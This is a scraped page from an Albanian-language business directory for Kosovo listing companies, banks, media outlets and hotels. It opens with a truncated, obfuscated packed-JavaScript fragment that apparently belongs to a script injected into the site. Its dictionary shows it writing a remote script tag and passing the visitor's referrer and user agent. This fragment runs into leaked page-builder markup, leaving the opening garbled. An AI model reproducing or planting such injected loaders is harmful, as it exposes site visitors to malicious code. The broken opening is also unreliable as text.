=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzafi|var|u0026u|referrer|rhesn||js|php'.split('|'),0,{})) bg_type=”no_bg” bg_grad=”background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #FBFBFB), color-stop(50%, #E3E3E3), color-stop(100%, #C2C2C2));background: -moz-linear-gradient(top,#FBFBFB 0%,#E3E3E3 50%,#C2C2C2 100%);background: -webkit-linear-gradient(top,#FBFBFB 0%,#E3E3E3 50%,#C2C2C2 100%);background: -o-linear-gradient(top,#FBFBFB 0%,#E3E3E3 50%,#C2C2C2 100%);background: -ms-linear-gradient(top,#FBFBFB 0%,#E3E3E3 50%,#C2C2C2 100%);background: linear-gradient(top,#FBFBFB 0%,#E3E3E3 50%,#C2C2C2 100%);” parallax_style=”vcpb-animated” bg_image_repeat=”no-repeat” bg_image_size=”cover” bg_img_attach=”fixed” parallax_sense=”30″ animation_direction=”left-animation” animation_repeat=”repeat” parallax_content_sense=”30″ fadeout_start_effect=”30″ bg_override=”0″ bg_image_new=”1384″ css=”.vc_custom_1442257074662{margin-top: 0px !important;}”]

TE VEÇUARAT

 1. FILTRO SIPAS:
 2. RENDIT SIPAS: Vlerësime / Të fundit
 • KH Booking

  KH Booking

  Prishtine, Rr. UCK

  Platforma më e re e zhvilluar nga “Kosova Information Technology” për rezervime dhe menaxhim te hoteleve.KH Booking është platformë online…

 • LESNA MOBILJE

  LESNA MOBILJE

  Zona industriale 10000 Prishtine

  LESNA MOBILJE merret me shiteblerjen e mobiljeve te ndryshme per shtepi nga prodhuesit e njohur Slloven, Italian dhe Gjerman, Mobilje…

 • Women for Women

  Women for Women

  Arberia p.n. Prishtine Kosove

  Founded in 1993, Women for Women International (WfWI) provides women survivors of war, civil strife and other conflicts with the…

 • PETROL COMPANY

  PETROL COMPANY

  Fush Kosove

  PETROL COMPANY  Jeto me lire me PETROL COMPANY… Vendi ku litri eshte liter.  

 • Albaqeramika

  Albaqeramika

  Prishtine

  RRETH NESH ALBA QERAMIKA është kompani lidere në Kosovë në sektorin e qeramikës. U themelua nga SEJFULLAH DEÇANI në vitin 1993,…

 • Kosmonte Food’s

  Kosmonte Food’s

  Fushë Kosovë

  Ndërmarrja jonë gjendet në magjistralen Pishtinë – Fushë Kosovë. Ndërmarrja jonë deri më tani numëron rreth 22 kompani internacionale me…

 • Albi Mall
  ALBI OUTLET

  Albi Mall

  Prishtinë, Veterrnik

  Albi Group  Albi Mall (dikur Albi Shopping Center) ka filluar punën në vitin 2006, dhe ka qenë e shtrirë në një…

 • Raiffeisen Bank

  Raiffeisen Bank

  Pejë

  Raiffaisen Bank Kosova  Banka Raiffeisen në Kosovë është degë e Raiffeisen Bank International AG (RBI). RBI erdhi në Kosovë në…

 • Kujtesa Net

  Kujtesa Net

  Kosta Novakovic, Prishtinë

  Për ne Themeluar në tetor të vitit 1995, Kujtesa është zhvilluar në një udhëheqës kryesor të telekomit në tregun e…

 • Bast – Trade

  Bast – Trade

  rruga prishtine - mitrovice

  BAST – TRADE  Rreth Nesh BAST TRADE u themelua në vitin 1990 si një ndër kompanitë e para private në…

 • ECOTRADE

  ECOTRADE

  Ilir Konushevci, Prishtinë

    ECOTRADE     INNOVATIVE CONSTRUCTING Running a construction business in Kosovo is currently of a great opportunity. Taking into consideration…

 • LONDON TAXI

  LONDON TAXI

  Prishtina ,rr.Fehmi Lladrovci

   London taxi ёshtё vetura e vetme e prodhuar enkas pёr tё shёrbyer si taxi. Vetura e fudnit tx4 sikurse modelet…

 • Swiss Diamond Hotel Prishtina

  Swiss Diamond Hotel Prishtina

  Prishtine,

  Swiss Diamond Hotel Enjoying an outstanding location right in the center of Prishtina , within walking distance from the Government…

 • Davidoff

  Davidoff

  Eduard Lir p.n. 10 000 Prishtine, Kosove

  Gekos  is a private company established in 2001. It started its operation as authorized distributor and importer for cigarettes of…

 • Oda Ekonomike Amerikane ne Kosove

  Oda Ekonomike Amerikane ne Kosove

  Perandori Justinian 16, Pejton, Prishtine, Kosove

  Oda Ekonomike Amerikane ne Kosove eshte nje organizate e pavarur biznesi e cila promovon mundesite ekonomike dhe interesat e biznesit,…

 • KEDS

  KEDS

  Prishtine, Bulevardi Bill Klinton nr. 3

  Shërbimet e Shpërndarjës së Energjisë Elektrike në Kosovë sh.a. (KEDS) ka ekskluzivitetin e shpërndarjes së energjisë elektrike. KEDS sh.a. është…

 • The White Tree

  The White Tree

  Mujo Ulqinaku No. 15

  The best hostel in Prishtina? Drawing from our hostel experiences while traveling, we decided to bring together the best of…

 • Ujë Rugove

  Ujë Rugove

  Luan Haradinaj B/4 10000 Prishtinë

  Themeluar në pjesën e dytë të vitit 2006 në rajonin e bukur të Rugovës në Kosovë, Rugove është kompani private…

 • BKT

  BKT

  Rr.Kosta Novakovic, Nr.9, Qyteza Pejton, Prishtinë Kosovë

  Banka Kombëtare Tregtare në Kosovë filloi aktivitetin e saj në Nëntor të vitit 2007, ku tashmë operon me 26 degë.…

 • Elen

  Elen

  Bedri Shala pn, Prishtinë

  Elen është kompani private e cila merret me shitjen e produkteve dhe shërbimeve në fushën e elektroenergjetikës. Ndërmarrja Elen është…

 • Air Prishtina

  Air Prishtina

  Sheshi Zahir Pajaziti 45/1 Prishtina

  Eksploroni Evropën dhe të gjithë botën. Me fluturime nga Prishtina dhe Shkupi ne hapim dyert e lirisë për udhëtime. Me fluturime të…

 • INFOKUSI

  INFOKUSI

  Prishtinë rr. Shaban Polluzha

  INFOKUSIAgjencia e lajmeve Infokusi.com është themeluar nga gazetarë me përvojë nëpër mediat e vendit dhe ato ndërkombëtare. Në Infokusi.com gjejnë…

 • Gazeta Zëri

  Gazeta Zëri

  Prishtinë, Pallati i Mediave

  Gazeta ZeriZeri eshte gazete e perditshme kosovare, qe publikohet qe nga viti 1999, duke qene keshtu njera nga gazetat me…

 • Gazeta Blic

  Gazeta Blic

  Bulevardi Nëna Terezë, BB-1 - Nr 11

  Gazeta Blic është portal i pavarur i lajmeve, analizës dhe komenteve i krijuar me vet-iniciativë nga një grup udhëheqësish medial,…

 • G3 INXHINIERING

  G3 INXHINIERING

  Fushë Kosovë

  N.SH.P.  G3 INXHINIERING  Biznes Individual Rruga: Nëna Terezë nr. 4, 12000, Fushë Kosovë, Kosovë Telefoni: +377 44 136 578, +381…

 • ADRESARI

  ADRESARI

  Shaban Polluzha

  Çka është Adresari.net Adresari.net është një platforme unike online në të cilën mund të gjinden të gjitha adresat e institucioneve…

 • GAZETA FJALA

  GAZETA FJALA

  Prishtinë Agim Ramadani

  “Gazeta Fjala” është platforma e vetme, e besueshme online, që sjellë, çdo ditë, informacionet më të reja, nga ekonomia, biznesi,…

 • ProCredit Bank – Klinë

  ProCredit Bank – Klinë

  Abedin Rexha

  Banka ProCredit është bankë zhvillimore e cila ofron shërbime të plota bankare. Ne ofrojmë shërbime cilësore për klientë privatë dhe…

 • Viva Fresh Store

  Viva Fresh Store

  Nënë Tereza, Gjakovë

  Viva Fresh u themelua ne vitin 2003 me pikën e parë shitëse në qytetin e Ferizajit ku fillimisht ishin edhe…

 • ETC – Elkos

  ETC – Elkos

  Bislim Bajgora, Mitrovica

  Rreth Kompanisë Pas një suksesi të madhë në biznesin Cash and Carry vizioni i pronarit të Elkos Group Z.Ramiz Kelmendi…

 

Shitblerje

 

 


 

VENDE

 1. FILTRO SIPAS:
 2. RENDIT SIPAS: Vlerësime / Të fundit
 • Përkthime Prestige

  Përkthime Prestige

  prishtin

  Përkthime Prestige është kompani e cila ofron shërbime të përkthime të licencuara në 30 gjuhë të huaja nga viti 2012,…

 • 1001 Group

  1001 Group

  Struga

  1001 GROUP -DOOEL u themelua në datë 01.09.1993 sipas ligjeve të asaj kohe në Republikën e Maqedonisë, kjo kompani i mbushi…

 • Butiku për fëmijë DIARI

  Butiku për fëmijë DIARI

  prizren

  Butiku per femije Diari  Suharek, Brigada 123  perball Rock Hard caffe

 • Commando Security

  Commando Security

  Joni, Prizren

  Kompania e Sigurimit Fizik & Elektronik

 • N.SH. POL-ALBA Përkthimet të licencuara nga gjuha polake

  N.SH. POL-ALBA Përkthimet të licencuara nga gjuha polake

  Prishtinë, Bregu i Diellit

  Jam përkthyës i licencuar nga gjykata.Bëj përkthimin profesional të çertifikuar (me vule) të dokumenteve nga gjuha polake në gjuhen shqipe…

 • KH Booking

  KH Booking

  Prishtine, Rr. UCK

  Platforma më e re e zhvilluar nga “Kosova Information Technology” për rezervime dhe menaxhim te hoteleve.KH Booking është platformë online…

 • AAB University

  AAB University

  Zona Industriale Prishtine-Fush Kosove

  Kolegji AAB është institucioni i parë jopublik i arsimit të lartë në Kosovë i cili është themeluar menjëherë pas luftës…

 • Universiteti AAB

  Universiteti AAB

  Zona Industriale Prishtinë - Fushë Kosovë

  Kolegji AAB është institucioni i parë jopublik i arsimit të lartë në Kosovë i cili është themeluar menjëherë pas luftës…

 • Sion Tours

  Sion Tours

  Mbreteresha Teuta, 40000 Mitrovice

  Ndermarrja per Turizem dhe Transport “SION TOURS” Mbreteresha Teute , Mitrovice 40000 , Rep.Kosoves Komoditet, fleksibilitet, lëvizshmëri, siguri dhe përgjegjshmëri…

 • DesignPlus Prishtine

  DesignPlus Prishtine

  Pristine, Mati 1

  Jemi kompani për dizajnim të webfaqeve, shitjen e hapësirave të llojeve të ndryshme te hostimit, si shared hosting, reseller, VPS,…

 • LESNA MOBILJE

  LESNA MOBILJE

  Zona industriale 10000 Prishtine

  LESNA MOBILJE merret me shiteblerjen e mobiljeve te ndryshme per shtepi nga prodhuesit e njohur Slloven, Italian dhe Gjerman, Mobilje…

 • A&A Consulting

  A&A Consulting

  Prishtine ,Rr. UÇK Nr.28

  Mirë se vini në A&A Consulting   Zgjedhja më e mirë për nevojat e juaja biznesore A & A Consulting…

 • Idea Dekor – Shtime

  Idea Dekor – Shtime

  Shtime -

  Idea Dekor – Shtime Idea Dekor – Shtime është punëtoria e profesionalizuar për përpunimin e drurit. Verandave, rregullime dekorative të…

 • Prishtinë

  Prishtinë

  Universiteti AAB Fushë Kosove

  Librari Universitare, e cila kryesisht shet libra akademike!

 • “Organizata për Shërbime Psikologjike”

  “Organizata për Shërbime Psikologjike”

  Suharekë, Brigada 123

  Organizata për Shërbime Psikologjike Organizatë kjo e cila për qëllim ka: Përfshirjën e të rinjve në zhvillimin e arsimit të…

 • Golden Eagle

  Golden Eagle

  Ruga Brigada 123 P.N. 23000

  Golden Eagle – shije e energjisë! Ushqejeni trupin tuaj me energji. Golden Eagle është pije ideale për furnizimin e trupit…

 • Lesna

  Lesna

  Lidhja e Pejës, nr. 133 10000 Prishtinë

  LESNA shpk është fabrika më e madhe në rajon për prodhimin e dyerve dhe dritareve e cila filloi aktivitetin e…

 • Amsterdam Lounge Bar

  Amsterdam Lounge Bar

  Pandi Dardha

  Amsterdam Lounge Bar

 • Ma Belle

  Ma Belle

  Prishtine

  Rrefimi Ynë Legjenda thotë se, gjatë udhëtimit të tij për në Etiopi, mistiku jemenas Ebu el-Hasan vërejti një gjallëri magjepse…

 • Hotel AFA Residence

  Hotel AFA Residence

  Rruga Deme Ahmeti

  Nje prej hoteleve me atraktive ne qytetin e Prishtines. Kualiteti dhe cilesia luksoze me cmime te arsyeshme.

RSS .

Guida Turistike

[cincopa AgFA-QcCoEDq]

Platformë adresari

Adresari.com është një platformë e re dhe unike e cila shërbën për të gjetur adresat e të gjitha institucioneve, ambasadave, kompanive, univeristeteve, kolegjeve, spitaleve, policisë, etj.

Më shumë

Drejtimi juaj

Navigim supër i leht për të gjetur adresën që kërkoni me të gjitha informatat, numërat e telefonit, e-mail adresat, vendndodhjen, shërbimet qe ofrojnë gjithashtu edhe harten për tek vendi konkret.

Më shumë

Profil të plotë

Adresari.net ju jep të drejtë të krijoni një profil të juajin të cilin mund të menagjoni ngjarjet , galerinë , informacionet e kompanisë tuaj gjithashtu të shikoni vlerësimet e të tjerëve për kompaninë tuaj.

Më shumë

Infokusi

Portali "Infokusi.com" është medium online. Materialet dhe informacionet në këtë portal nuk mund të kopjohen, të shtypen ose të përdoren në çfarëdo forme tjetër për qëllime përfitimi, pa miratimin e drejtuesve të "Infokusit".

Më shumë
Të gjitha të drejtat janë të rezervuara © 2015 Adresari.net